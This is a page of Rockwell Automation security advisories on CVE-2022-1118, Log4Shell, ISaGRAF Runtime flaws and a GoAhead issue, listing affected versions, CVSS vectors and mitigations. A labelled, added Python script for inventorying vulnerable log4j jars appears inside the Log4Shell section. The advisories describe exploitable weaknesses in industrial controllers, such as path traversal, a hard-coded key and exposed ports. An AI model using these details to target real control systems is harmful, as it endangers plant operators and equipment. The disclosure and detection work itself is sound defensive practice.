Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable the assessment, design, implementation, and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Additional Links

  • PN1354 - Industrial Security Advisory Index
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • Hardening Guidance (CIS Benchmarks)

If you have questions regarding this notice, please send an email to our product security inbox at: PSIRT@rockwellautomation.com

High
PN1589 | Multiple Products Vulnerable to Deserialization of Data
Published Date:
April 04, 2022
Last Updated:
April 04, 2022
CVE IDs:
CVE-2022-1118
Products:
Using CCW with Micro800 Controllers, ISaGRAF, Using CCW with Component Class Drives, Using CCW with PanelView Component Terminals
CVSS Scores:
8.6
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Version 1.0 – April 4, 2022

Executive Summary

Rockwell Automation received a report from the researcher Kimiya through Trend Micro’s Zero Day Initiative about vulnerabilities in Connected Components Workbench™, ISaGRAF® Workbench and Safety Instrumented Systems Workbench for Trusted® controllers. If successfully exploited, these vulnerabilities may result in remote code execution. These vulnerabilities all require user interaction through a phishing attack, for example, to be successfully exploited.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

  • Connected Components Workbench v13.00.00 and below.
  • ISaGRAF Workbench v6.0-v6.6.9
  • Safety Instrumented System Workstation v1.2 and below (for Trusted Controllers)

Vulnerability Details

CVE-2022-1118: Deserialization of untrusted data may result in arbitrary code execution
Connected Components Workbench does not limit the objects that can be deserialized. This vulnerability allows attackers to craft a malicious serialized object that, if opened by a local user in Connected Components Workbench, may result in arbitrary code execution. This vulnerability requires user interaction to be successfully exploited.

CVSS v3.1 Base Score: 8.6/10[HIGH]
CVSS v3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Risk Mitigation & User Action

Customers using the affected software are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
Products Affected | Suggested Actions
  • Connected Components Workbench versions 13.00 and below: Customers should update to version 20.00, which mitigates this vulnerability.
  • ISaGRAF Workbench versions 6.0-6.6.9: It is recommended that customers follow the security guidelines below until an updated release is available to mitigate this issue.
  • SIS Workstation versions 1.2 and below (for Trusted Controllers): It is recommended that customers follow the security guidelines below until an updated release is available to mitigate this issue.

If an upgrade is not possible or available, customers should consider deploying the following mitigations:
  • Run Connected Components Workbench as a User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Do not open untrusted .ccwsln files with Connected Component Workbench, ISaGRAF, or SISW. Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.
  • Use of Microsoft® AppLocker or other similar allow list applications can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at QA17329 - Using Rockwell Automation Software Products with AppLocker
  • Confirm that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.

General Security Guidelines

  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, see PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that a VPN is only as secure as the connected devices.
Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the PSIRT Inbox (PSIRT@rockwellautomation.com).

Additional Links

  • PN1354 - Industrial Security Advisory Index
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide (Pub. enet-td002)
  • http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-1118

Critical
PN1579 | Log4Shell Vulnerability Notice
Published Date:
January 21, 2022
Last Updated:
December 01, 2024
CVE IDs:
CVE-2021-4104, CVE-2021-45046, CVE-2019-17571, CVE-2021-44228
Products:
Production Management
CVSS Scores (v3.1):
10, 3.7, 8.1, 9.8
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes

Revision Number: 2.2

Revision History
Version 1.0 – 12-Dec-2021. Initial Version
Version 1.1 – 15-Dec-2021. Updated Affected Products and Risk Mitigation & User Actions
Version 1.2 – 17-Dec-2021. Updated FTA DataView Versions affected
Version 2.0 – 19-Dec-2021. Updated Affected Products and Risk Mitigation & User Actions, etc.
Version 2.1 – January 7, 2022. Updated FactoryTalk® Analytics™ DataView, Data Flow ML, Warehouse Management Patch Guidance and User Actions, etc.
Version 2.2 – January 21, 2022. Updated DataView Mitigation Actions, etc.

Executive Summary

On December 9, 2021, researchers announced a vulnerability named “Log4Shell”. This vulnerability allows remote code execution by exploiting the Apache Log4j 2 Java logging library (log4j2).

Rockwell Automation is aware of this vulnerability and of how it could, if exploited, potentially impact our customers’ environments. Rockwell Automation has completed its evaluation of how the mitigation techniques will impact the functionality and performance of the Rockwell Automation hardware, software, and pre-engineered products and solutions that incorporate this software.

Affected Products

Rockwell Automation has investigated its product portfolio to identify which of its products may be directly affected by the "Log4Shell" vulnerability. Rockwell Automation will continue to monitor this situation and will update this advisory if necessary. Our investigation has indicated that the following Rockwell Automation products are affected.
Product Affected | Versions Affected
  • Plex (A Rockwell Automation Company) Industrial Internet of Things: All Versions < 2.17
  • Fiix (A Rockwell Automation Company) CMMS™ core V5: This product is cloud-based and has been updated for all customers.
  • Warehouse Management: 4.01.00, 4.02.00, 4.02.01, 4.02.02
  • EIG (Discontinued): 3.03.00
  • Industrial Data Center 9300-NS-ESSENTIAL, 9300-NS-ESSENTIALPLUS: Gen 1, Gen 2, Gen 3, Gen 3.5
  • VersaVirtual™ Application 9300-VV2000RN, 9300-VV2000EN, 9300-VV1000RN, 9300-VV1000EN: Series A
  • FactoryTalk® Analytics™ DataFlowML: All Versions until 4.00.00 (including)
  • FactoryTalk Analytics DataView: All
  • Firewall Managed Support – Cisco FirePOWER® Threat Defense 9300-FMAN, 9300-FSYS: Version 6.2.3 – 7.1.0

Vulnerability Details

CVE-2021-44228: Apache Log4j2 JNDI features do not help protect against attacker-controlled LDAP and other JNDI related endpoints

Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.

CVSS v3.1 Base Score: 10/10 [Critical]
CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack

It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in a denial of service (DOS) attack. Log4j 2.15.0 restricts JNDI LDAP lookups to localhost by default. Note that previous mitigations involving configuration such as to set the system property log4j2.noFormatMsgLookup to true do NOT mitigate this specific vulnerability.

CVSS v3.1 Base Score: 3.7/10 [Moderate]
CVSS v3.1 Vector: AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L

CVE-2021-4104: JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data

JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.

CVSS v3.1 Base Score: 8.1/10 [High]
CVSS v3.1 Vector: AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2019-17571: Included in Log4j 1.2 is a SocketServer class that is vulnerable to deserialization of untrusted data

Included in Log4j 1.2 is a SocketServer class that is vulnerable to deserialization of untrusted data, which can be exploited to remotely execute arbitrary code when combined with a deserialization gadget while listening to untrusted network traffic for log data. This affects Log4j versions 1.2 up to 1.2.17.

CVSS v3.1 Base Score: 9.8/10 [Critical]
CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Risk Mitigation & User Action

Vulnerability | Products Affected | Suggested Actions

CVE-2021-44228
  • Plex Industrial IoT: This product has been updated to version 2.17.1 and all vulnerabilities are mitigated at this time. No user action is required.
  • Fiix CMMS core V5: The product has been updated to remove Log4j completely and is no longer vulnerable. No user interaction is required.
  • Warehouse Management Version 4.01.00, 4.02.00, 4.02.01, 4.02.02: Customers should upgrade to version 4.02.03, which has been released to mitigate this vulnerability.
  • MES EIG 3.03.00: This product is currently discontinued and therefore no patch will be provided. Customers should upgrade to EIG Hub if possible or work with their local representatives about alternative solutions.
  • Industrial Data Center (9300-NS-ESSENTIAL, 9300-NS-ESSENTIALPLUS) – Gen 1, Gen 2, Gen 3, Gen 3.5:
    - For non-managed support customers, follow the mitigation instructions outlined by VMware in VMSA-2021-0028.
    - For managed support customers, the Rockwell Automation support team will be reaching out to affected customers to implement mitigation steps. For specific site details, please contact the support team or your Customer Success Manager.
    - For non-managed support customers with a VNXe, follow the mitigation outlined by Dell in DSA-2021-298.
    - For non-managed support customers with a Data Domain, follow the mitigation outlined by Dell in DSA-2021-274.
  • VersaVirtual (9300-VV2000RN, 9300-VV2000EN, 9300-VV1000RN, 9300-VV1000EN) – Series A:
    - For non-managed support customers, follow the mitigation instructions outlined by VMware in VMSA-2021-0028.2.
    - For managed support customers, the Rockwell Automation support team will be reaching out to affected customers to implement mitigation steps. For specific site details, please contact the support team or your Customer Success Manager.
  • FactoryTalk Analytics DataFlowML: Customers should upgrade to version 4.00.01, which has been released to mitigate this vulnerability. It is recommended that customers not use DataFlow ML prior to version 4.00.01.
  • FactoryTalk Analytics DataView 3.02: Customers are required to upgrade from 3.02 to 3.03.01. Customers who have prior versions are required to upgrade to 3.02 first. It is recommended that customers not use DataFlow ML prior to version 4.00.00.
  • Firewall Managed Support – Cisco Firepower Threat Defense (9300-FMAN, 9300-FSYS) Version 6.2.3 – 7.1.0:
    - For managed support customers, the Rockwell Automation support team will be reaching out to affected customers to implement mitigation steps. For specific site details, please contact the support team or your Customer Success Manager.
    - For non-managed support customers, follow the mitigation instructions outlined by Cisco in CSCwa46963.

CVE-2021-45046, CVE-2021-4104, CVE-2019-17571
  • No products affected at this time.

Products Using Log4j 1.2
A number of Rockwell Automation products contain log4j libraries that may be detected by various scanning tools. These products do not use the JMSAppender nor the Socket Server and are not vulnerable to CVE-2021-4104 and CVE-2019-17571:

Products Evaluated and Not Affected | Suggested Actions
  • FactoryTalk Analytics DataView 3.02.00, 3.03.00, 4.00.00, 4.01.00
  • Data Scheduler
  • FactoryTalk Augmented Modeler
  • FactoryTalk Analytics DataFlowML 2.01
  • FactoryTalk Analytics Information Platform
  • Live Transfer 10.4, 11.0
  • Pavilion8
  • FactoryTalk Analytics Security Provider 3.02.00, 3.03.00
  • PanelView 5000
  • FactoryTalk ProductionCentre (All Versions)
  • FactoryTalk PharmaSuite (All Versions)
No actions are needed as these products do not use the JMSAppender nor the Socket Server and therefore are not vulnerable.

  • Studio 5000 View Designer
Studio 5000 does not use the JMSAppender nor the Socket Server and is not vulnerable. Note: Studio 5000 consists of Studio 5000 Logix Designer and Studio 5000 View Designer. If Logix Designer is the only component required, then View Designer version 8 or older may be removed by uninstalling it using the Windows Add/Remove Programs feature. Uninstall “Studio 5000 View Designer”. This will remove the log4j 1.2x library completely. Alternatively, update Studio 5000 View Designer to version 9 or later, which has updated log4j libraries that are not vulnerable.
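The conditions this advisory describes (the log4j-core 2.x ranges for CVE-2021-44228 and CVE-2021-45046, the removal of JndiLookup.class as a mitigation, and Log4j 1.2 being exposed only when JMSAppender or SocketServer is configured) can be checked on a host with a small inventory script. The following is an added example, not Rockwell Automation's code or tooling: it identifies log4j-core versions by jar file name (also one level inside .war/.ear/.zip containers), flags the CVE exposure, records whether JndiLookup.class is still packaged, and for Log4j 1.2 jars checks whether a log4j.properties/log4j.xml beside them wires up JMSAppender; the SocketServer case is a separately launched process and is not covered. The deployment tree it scans is constructed inline, and the file names and contents are not real product files.

```python
import io
import re
import tempfile
import zipfile
from dataclasses import dataclass
from pathlib import Path
from typing import Optional

CORE_RE = re.compile(r"log4j-core-(\d+)\.(\d+)(?:\.(\d+))?(?:-beta(\d+))?\.jar$")
LOG4J1_RE = re.compile(r"log4j-1\.2\.(\d+)\.jar$")
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
JMS_APPENDER = "org.apache.log4j.net.JMSAppender"

def version_key(major, minor, patch, beta=None):
    # Pre-release builds sort before their release: 2.0-beta9 < 2.0.0.
    return (major, minor, patch, 0 if beta is not None else 1, beta or 0)

def assess_log4j2(version):
    """(cve_2021_44228, cve_2021_45046) for a (major, minor, patch, beta) tuple, using the ranges
    above: 2.0-beta9..2.12.1 and 2.13.0..2.14.x for the RCE; 45046 also hits 2.15.0 (fixed in 2.16.0)."""
    major, minor, patch, beta = version
    k = version_key(major, minor, patch or 0, beta)
    old_branch = version_key(2, 0, 0, 9) <= k <= version_key(2, 12, 1)   # 2.12.2 is a fixed release
    new_branch = k >= version_key(2, 13, 0)
    return (old_branch or (new_branch and k < version_key(2, 15, 0)),
            old_branch or (new_branch and k < version_key(2, 16, 0)))

@dataclass
class Finding:
    path: str
    version: str
    cve_2021_44228: bool = False
    cve_2021_45046: bool = False
    jndi_lookup_present: Optional[bool] = None      # log4j 2 only
    jms_appender_configured: Optional[bool] = None  # log4j 1.2 only

def inspect_core_jar(data, path):
    """Classify one log4j-core 2.x jar by file-name version and whether JndiLookup.class is packaged."""
    major, minor, patch, beta = (int(g) if g is not None else None
                                 for g in CORE_RE.search(Path(path).name).groups())
    rce, dos = assess_log4j2((major, minor, patch, beta))
    with zipfile.ZipFile(io.BytesIO(data)) as jar:
        jndi = JNDI_CLASS in jar.namelist()  # False once the class was removed per the Apache guidance
    label = f"{major}.{minor}" + (f".{patch}" if patch is not None else "")
    return Finding(str(path), label + (f"-beta{beta}" if beta is not None else ""), rce, dos, jndi)

def uses_jms_appender(directory):
    """True if a Log4j 1.2 config next to the jar wires up JMSAppender (CVE-2021-4104 precondition)."""
    for cfg in ("log4j.properties", "log4j.xml"):
        p = directory / cfg
        if p.is_file() and JMS_APPENDER in p.read_text(encoding="utf-8", errors="replace"):
            return True
    return False

def scan_tree(root):
    findings = []
    for path in (p for p in Path(root).rglob("*") if p.is_file()):
        if CORE_RE.search(path.name):
            findings.append(inspect_core_jar(path.read_bytes(), str(path)))
        elif LOG4J1_RE.search(path.name):
            findings.append(Finding(str(path), "1.2." + LOG4J1_RE.search(path.name).group(1),
                                    jms_appender_configured=uses_jms_appender(path.parent)))
        elif path.suffix.lower() in (".jar", ".war", ".ear", ".zip"):
            try:  # container archives: look one level down for embedded log4j-core jars
                with zipfile.ZipFile(path) as z:
                    for inner in z.namelist():
                        if CORE_RE.search(inner.rsplit("/", 1)[-1]):
                            findings.append(inspect_core_jar(z.read(inner), f"{path}!{inner}"))
            except zipfile.BadZipFile:
                continue
    return findings

def _zip_bytes(entries):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for name, data in entries.items():
            z.writestr(name, data)
    return buf.getvalue()

def run_demo():
    """Build a constructed sample deployment (not real product files), scan it, and key results by version."""
    root = Path(tempfile.mkdtemp())
    (root / "app" / "lib").mkdir(parents=True)
    (root / "legacy").mkdir()
    files = {
        "app/lib/log4j-core-2.14.1.jar": _zip_bytes({JNDI_CLASS: b""}),
        "app/lib/log4j-core-2.15.0.jar": _zip_bytes({"META-INF/MANIFEST.MF": b""}),  # JndiLookup.class removed
        "app/portal.war": _zip_bytes({"WEB-INF/lib/log4j-core-2.12.2.jar": _zip_bytes({"META-INF/MANIFEST.MF": b""})}),
        "legacy/log4j-1.2.17.jar": _zip_bytes({"META-INF/MANIFEST.MF": b""}),
        "legacy/log4j.properties": (f"log4j.rootLogger=INFO, jms\nlog4j.appender.jms={JMS_APPENDER}\n"
                                    "log4j.appender.jms.TopicBindingName=logTopic\n").encode(),
    }
    for rel, data in files.items():
        (root / rel).write_bytes(data)
    return {f.version: f for f in scan_tree(root)}
```

Shaded or renamed jars carry no version in the file name and would be missed; for those, the presence of JndiLookup.class inside the archive is still a usable signal.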

General Security Guidelines

See the Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Industrial Security Services website for information on security services from Rockwell Automation to assess, protect, detect, respond and recover from incidents. These services include assessments, designs, implementations, industrial anomaly detection, patch management, and remote infrastructure monitoring and administration.

We also recommend concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located in PN1354 – Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

If you have questions regarding this notice, please send an email to our product security inbox at: secure@ra.rockwell.com.

General Mitigations

  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • Visit the links below for more mitigation techniques.

Additional Links

  • NVD - CVE-2021-44228 (nist.gov)
  • NVD - CVE-2021-45046 (nist.gov)
  • NVD - CVE-2021-4104 (nist.gov)
  • NVD - CVE-2019-17571 (nist.gov)
  • Apache Log4j Vulnerability Guidance | CISA
  • Log4j – Apache Log4j Security Vulnerabilities
  • PN1354 - Industrial Security Advisory Index
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide

Critical
PN1567 | ISaGRAF Runtime Affected by Multiple Vulnerabilities
Published Date:
December 30, 2021
Last Updated:
December 30, 2021
CVE IDs:
CVE-2020-25184, CVE-2020-25180, CVE-2020-25176, CVE-2020-25182, CVE-2020-25178
Products:
AADvance, ISaGRAF, Micro800
CVSS Scores:
9.1, 7.8, 5.3, 7.5, 6.7
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision Number: 1.3

Revision History
Version 1.3 – March 19, 2024. Added AADvance Eurocard controller to Affected Products and updated Suggested Actions for AADvance Eurocard controller
Version 1.2 – December 30, 2021. Updated Suggested Actions for AADvance® Controller version 1.40 and earlier

Executive Summary

Rockwell Automation received a report from Kaspersky regarding five vulnerabilities in ISaGRAF® Runtime 4 and 5. If successfully exploited, these vulnerabilities may result in remote code execution, information disclosure, or denial of service.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

ISaGRAF Runtime 4.x and 5.x
The following Rockwell Automation products are based on ISaGRAF to design integrated automation solutions:
  • AADvance® Controller version 1.32 and earlier
  • ISaGRAF Free Runtime in ISaGRAF6 Workbench version 6.6.8 and earlier
  • Micro800™ family, all versions

Vulnerability Details

CVE-2020-25176: Code Execution due to Relative Path Traversal
Some commands used by the ISaGRAF eXchange Layer (IXL) protocol perform various file operations in the file system. Since the parameter pointing to the file name is not checked for reserved characters, it is possible for a remote attacker authenticated on the IXL protocol to traverse an application’s directory, which could lead to remote code execution.

CVSS v3.1 Base Score: 9.1/10 [CRITICAL]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CVE-2020-25184: Information Disclosure due to cleartext storage of passwords in a file and memory
ISaGRAF Runtime stores the password in plaintext in a file which is located in the same directory with the executable file. ISaGRAF Runtime reads the file and saves the data in a variable without any additional modification. A local, unauthenticated attacker could compromise the user passwords resulting in information disclosure.

CVSS v3.1 Base Score: 7.8/10 [HIGH]
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2020-25178: Information Disclosure due to Cleartext Transmission of Information
ISaGRAF Workbench communicates with ISaGRAF Runtime using TCP/IP. The communication protocol provides various file system operations as well as uploading applications. Data is transferred over this protocol unencrypted, which could allow a remote, unauthenticated attacker to upload, read and delete files.

CVSS v3.1 Base Score: 7.5/10 [HIGH]
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2020-25182: Code Execution due to Uncontrolled Search Path Element
ISaGRAF Runtime searches and loads DLLs as dynamic libraries. Uncontrolled loading of dynamic libraries could allow a local, unauthenticated attacker to execute arbitrary code. This vulnerability only affects Microsoft Windows systems running ISaGRAF Runtime.

CVSS v3.1 Base Score: 6.7/10 [HIGH]
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CVE-2020-25180: Information Disclosure due to Hard-coded Cryptographic Key
ISaGRAF Runtime includes the functionality of setting a password which is required to execute privileged commands. The password value passed to ISaGRAF Runtime is the result of encryption performed with a fixed key value using the Tiny Encryption Algorithm (TEA) on a password that has been entered or saved. A remote, unauthenticated attacker could pass their own encrypted password to the ISaGRAF 5 Runtime, which may result in information disclosure on the device.

CVSS v3.1 Base Score: 5.3/10 [MEDIUM]
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N

Risk Mitigation & User Action

Customers using the affected software are encouraged to update to the available software revisions and to apply the risk mitigations below. Customers are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense-in-depth strategy.
Vulnerability | Affected Products | Suggested Mitigations

CVE-2020-25176
Affected products: AADvance Controller, ISaGRAF5 Runtime, Micro800 family, AADvance Eurocard controller
Suggested mitigations:
  • Rockwell Automation recommends upgrading to ISaGRAF Runtime 5 version 5.72.00 and AADvance Controller firmware to version 1.041.3.
  • Customers should confirm that the least-privilege user principle is followed, and user/service account access to Runtime's folder location is granted with a minimum number of rights as needed.
  • For ISaGRAF, customers are encouraged to restrict or block traffic on TCP 1131 from outside of the industrial control system network zone. For more information on the TCP/UDP ports used by ISaGRAF, refer to product documentation.
  • Since ISaGRAF 5 Runtime is provided to a customer as a development kit, implementing least-privilege may vary from implementation to implementation based on the hardware in use.
  • For AADvance controllers, customers should update to version 1.041.3 to mitigate this vulnerability.
  • For the Micro800 family, to reduce risk, customers are encouraged to help protect the controller with a password. Additionally, customers deploying Micro870®, Micro850®, or Micro830® controllers are encouraged to put the controller's mode switch to "RUN". Customers are encouraged to restrict or block traffic on TCP 44818 from outside the industrial control system network zone.
  • Customers should also confirm they are employing proper network segmentation and security controls. Specifically, network exposure for all control system devices should be minimized, and control systems should be behind firewalls and isolated from other networks when possible.
  • For more information on the TCP/UDP ports used by Rockwell Automation products, see BF7490 - TCP/UDP Ports Used by Rockwell Automation Products.
  • Rockwell Automation recommends upgrading AADvance Eurocard Controller firmware to version 1.041.

CVE-2020-25178
Affected products: AADvance Controller, ISaGRAF5 Runtime, Micro800 family, AADvance Eurocard controller
Suggested mitigations:
  • Rockwell Automation recommends upgrading to ISaGRAF Runtime 5 version 5.72.00 and AADvance Controller firmware to version 1.041.3.
  • Customers should confirm that the least-privilege user principle is followed, and user/service account access to Runtime's folder location is granted with a minimum number of rights as needed.
  • Since ISaGRAF 5 Runtime is provided to a customer as a development kit, implementing least-privilege may vary from implementation to implementation based on the hardware in use.
  • Rockwell Automation recommends upgrading AADvance Eurocard Controller firmware to version 1.041.

CVE-2020-25182
Affected products: ISaGRAF5 Runtime
Suggested mitigations:
  • Rockwell Automation recommends upgrading to ISaGRAF Runtime 5 version 5.72.00.
  • Customers should confirm that the least-privilege user principle is followed, and user/service account access to Runtime's folder location is granted with a minimum number of rights as needed.
  • Since ISaGRAF 5 Runtime is provided to a customer as a development kit, implementing least-privilege may vary from implementation to implementation based on the hardware in use.

CVE-2020-25184
Affected products: AADvance Controller, ISaGRAF5 Runtime, AADvance Eurocard controller
Suggested mitigations:
  • Rockwell Automation recommends upgrading to ISaGRAF Runtime 5 version 5.72.00 and AADvance Controller firmware to version 1.041.3.
  • Customers should confirm that the least-privilege user principle is followed, and user/service account access to Runtime's folder location is granted with a minimum number of rights as needed.
  • For ISaGRAF, restrict or block traffic on TCP 1131 from outside of the industrial control system network zone. For more information on the TCP/UDP ports used by ISaGRAF, refer to product documentation.
  • Since ISaGRAF 5 Runtime is provided to a customer as a development kit, implementing least-privilege may vary from implementation to implementation based on the hardware in use.
  • For AADvance controllers, customers should update to version 1.041.3 to mitigate this vulnerability.
  • Rockwell Automation recommends upgrading AADvance Eurocard Controller firmware to version 1.041.

CVE-2020-25180
Affected products: AADvance Controller, ISaGRAF5 Runtime, AADvance Eurocard controller
Suggested mitigations:
  • To reduce risk, customers should confirm they are employing proper network segmentation and security controls. Specifically, network exposure for all control system devices should be minimized, and control systems should be behind firewalls and isolated from other networks when possible. See the Converged Plantwide Ethernet (CPwE) Design and Implementation Guide for best practices deploying network segmentation and broader defense in depth strategies.
  • Customers should consider using proper network infrastructure controls, such as firewalls, UTM devices, VPN, or other security appliances.
  • For ISaGRAF, restrict or block traffic on TCP 1131 from outside of the industrial control system network zone. For more information on the TCP/UDP ports used by ISaGRAF, refer to product documentation.
  • Since ISaGRAF 5 Runtime is provided to a customer as a development kit, implementing least-privilege may vary from implementation to implementation based on the hardware in use.
  • For AADvance controllers, customers should update to version 1.041.3 to mitigate this vulnerability.
  • Rockwell Automation recommends upgrading AADvance Eurocard Controller firmware to version 1.041.

General Security Guidelines

  • Use proper network infrastructure controls, such as firewalls, to help ensure that any communication protocols from unauthorized sources are blocked.
  • Block traffic to all protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to ports using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports, refer to the product documentation.
  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Using Microsoft® AppLocker or a similar application allow-listing tool can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article QA17329 - Using Rockwell Automation Software Products with AppLocker.
  • Confirm that the least-privilege user principle is followed, and that user/service account access to shared resources is granted with only the minimum rights needed.
  • Do not open untrusted .isasln and .acfproj files with ISaGRAF6 Workbench.
  • Do not click on or open URL links from untrusted sources.
  • Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted web sites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).


ADDITIONAL LINKS
  • PN1354 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • ICSA-20-280-01

 

Critical
PN1580 | GoAhead Web Server vulnerability in 1783-NATR
Published Date:
December 16, 2021
Last Updated:
December 16, 2021
CVE IDs:
CVE-2019-5097, CVE-2019-5096
Products:
Network Address Translation (NAT) Device
CVSS Scores:
7.5, 9.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
1.2
Revision History
Version 1.0 – December 15, 2021
Version 1.1 - December 16, 2021: Updated Suggested Actions
